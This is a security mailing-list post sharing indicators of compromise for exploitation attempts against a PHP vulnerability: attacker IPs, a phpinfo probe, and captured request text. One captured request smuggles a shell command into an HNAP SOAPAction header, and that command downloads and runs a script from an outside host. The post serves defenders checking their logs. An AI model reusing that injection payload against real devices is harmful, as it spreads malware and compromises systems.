USHE-ISO

Download

ushe-iso@lists.utahtech.edu

September 2024

1 participants
1 discussions

*IMPORTANT! IOCs for MS-ISAC 0-day PHP currently under exploit
by Eric Bennick 27 Sep '24

27 Sep '24

We're seeing evidence of command injection attempts, likely exploitation of this 0-day sent out by MS-ISAC. MS-ISAC CYBERSECURITY ADVISORY - Multiple Vulnerabilities in PHP Could Allow for Remote Code Execution - PATCH NOW - TLP: CLEAR (cisecurity.org) <https://learn.cisecurity.org/webmail/799323/2287372849/ae8748c409eb66ac8699…> Please check the logs of any servers that might be affected for these IOCs Source IPs: 154.6.147.208 104.192.1.166 45.90.163.19 RCE Payload ... ..... ....E..;....@............0.P........P. .....<?php phpinfo(); ?> Packet Text ... ..... ....E.......@...h..........P........P. .....path=/2xMhQtOP/test&_variables=%7B%22_metadata%22%3A%7B%22classname%22%3A%22ws/test.xml%22%7D%2C%22_variables%22%3A%7B%7D%7D Packet Text ... ..... ....E..|....@...-Z.......6.P........P. .....Host: 137.190.21.9:80 <http://137.190.21.9/> User-Agent: Mozila/5.0 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings/`cd <http://purenetworks.com/HNAP1/GetDeviceSettings/cd> && cd tmp && export PATH=$PATH:. && cd /tmp;wget http://146.19.191.205/a/wget.sh;chmod 777 wget.sh;sh wget.sh selfrep.dlink;rm -rf wget.sh`" Content-Length: 0

1 0